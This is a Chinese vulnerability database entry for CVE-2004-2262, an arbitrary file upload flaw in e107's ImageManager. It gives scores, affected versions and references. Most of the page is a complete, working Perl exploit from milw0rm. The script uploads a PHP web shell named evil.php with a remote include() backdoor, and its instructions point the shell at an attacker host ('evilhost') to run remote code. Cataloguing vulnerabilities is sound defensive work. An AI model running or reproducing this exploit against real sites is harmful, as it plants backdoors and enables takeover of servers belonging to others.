CVE-2004-2262
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-10 15:33:22
NMCOE    

[原文]ImageManager in e107 before 0.617 does not properly check the types of uploaded files, which allows remote attackers to execute arbitrary code by uploading a PHP file via the upload parameter to images.php.


[CNNVD]E107 Image Manager未授权文件上传漏洞(CNNVD-200412-202)

        ImageManager在e107 0.617之前的版本中不能正确地检查上传文件的类型,远程攻击者可以借助images.php的上传参数通过上传PHP文件来执行任意代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:e107:e107:0.616
cpe:/a:e107:e107:0.554
cpe:/a:e107:e107:0.615
cpe:/a:e107:e107:0.614
cpe:/a:e107:e107:0.611
cpe:/a:e107:e107:0.610
cpe:/a:e107:e107:0.545
cpe:/a:e107:e107:0.613
cpe:/a:e107:e107:0.612
cpe:/a:e107:e107:0.615a
cpe:/a:e107:e107:0.603
cpe:/a:e107:e107:0.555_beta

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2262
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2262
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-202
(官方数据源) CNNVD

- 其它链接及资源

http://e107.org/comment.php?comment.news.672
(PATCH)  MISC  http://e107.org/comment.php?comment.news.672
http://xforce.iss.net/xforce/xfdb/18670
(UNKNOWN)  XF  e107-images-file-upload(18670)
http://www.securityfocus.com/bid/12111
(UNKNOWN)  BID  12111
http://www.osvdb.org/12586
(UNKNOWN)  OSVDB  12586
http://securitytracker.com/id?1012657
(UNKNOWN)  SECTRACK  1012657
http://secunia.com/advisories/13657
(VENDOR_ADVISORY)  SECUNIA  13657
http://milw0rm.com/exploits/704
(UNKNOWN)  MILW0RM  704

- 漏洞信息

E107 Image Manager未授权文件上传漏洞
中危 输入验证
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        ImageManager在e107 0.617之前的版本中不能正确地检查上传文件的类型,远程攻击者可以借助images.php的上传参数通过上传PHP文件来执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (704)

e107 include() Remote Exploit (EDBID:704)
php webapps
2004-12-22 Verified
80 sysbug
N/A [点击下载]
####################################################################
#
#  _____ _
# |  ___| | _____      ___
# | |_  | |/ _ \ \ /\ / /
# |  _| | | (_) \ V  V /
# |_|   |_|\___/ \_/\_/
#      Security Group.
#
#                    -=[ e107 remote sploit ]=-                           
#                           by sysbug 
#                              
# Attack method:                                                               
# with this sploit u can send an include() vuln to a Host victim  
# the upload go to /images/evil.php
#                                                                
# C:\Perl\bin>perl sploit.pl www.site.com                          
# -=[ e107 remote sploit ]=-                                      
#         by sysbug 
# # www.site.com
# # OWNED OH YEAH!                                                
# # get your evilc0de in:                                          
# # www.site.com/images/evil.php?owned=http://evilhost/ 
# C:\Perl\bin>                                                     
# 
# credits: ALL MY FRIENDS!                                                                 
# HELP ? RTFM -> perl sploit.pl                                                                
#####################################################################
use IO::Socket;

if(@ARGV < 1){
usage();
exit;
}
main();

sub main(){

print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
$host[0] = $ARGV[0];
if($host[0] =~ /\//){
($host[1],$host[2])=split(/\//,$host[0]);
$host[0] =~ /\/(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
@handlers =("e107_handlers","handlers");
print "# $host[1]\n";
foreach $handler(@handlers){
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die "  s0k off\n";
print $socket "POST $path HTTP/1.1\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n";
print $socket "Accept-Language: pt\r\n";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n";
print $socket "Accept-Encoding: gzip, deflate\r\n";
print $socket "User-Agent: l33t br0ws3r\r\n";
print $socket "Host: $host[1]\r\n";
print $socket "Content-Length: 1646\r\n";
print $socket "Connection: Keep-Alive\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n";
print $socket "/\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n";
print $socket "Content-Type: application/octet-stream\r\n\r\n";
print $socket "<? include(\$owned); ?>\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n";
print $socket "baseline\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n";
print $socket "on\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "Refresh\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "OK\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n";
print $socket "Cancel\r\n";
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser<\/title>/){
print "# OWNED OH YEAH!\n";
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n";
$result = 1;
}
}
close($socket);
}
if($result){
exit;
}
print "# b4d upload!!";
}
sub usage(){
print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
print "# usage: perl $0 <host> \n";
}

# milw0rm.com [2004-12-22]
		

- 漏洞信息

12586
e107 images.php Arbitrary File Upload
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

e107 contains a flaw that may allow a malicious user to upload arbitrary files. The issue is triggered when a malicious user submits images with arbitrary file extensions via the Image Manager in images.php. It is possible that the flaw may allow a malicious user to upload PHP files into the web root resulting in a loss of integrity.

- 时间线

2004-12-26 2004-12-23
2004-12-23 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站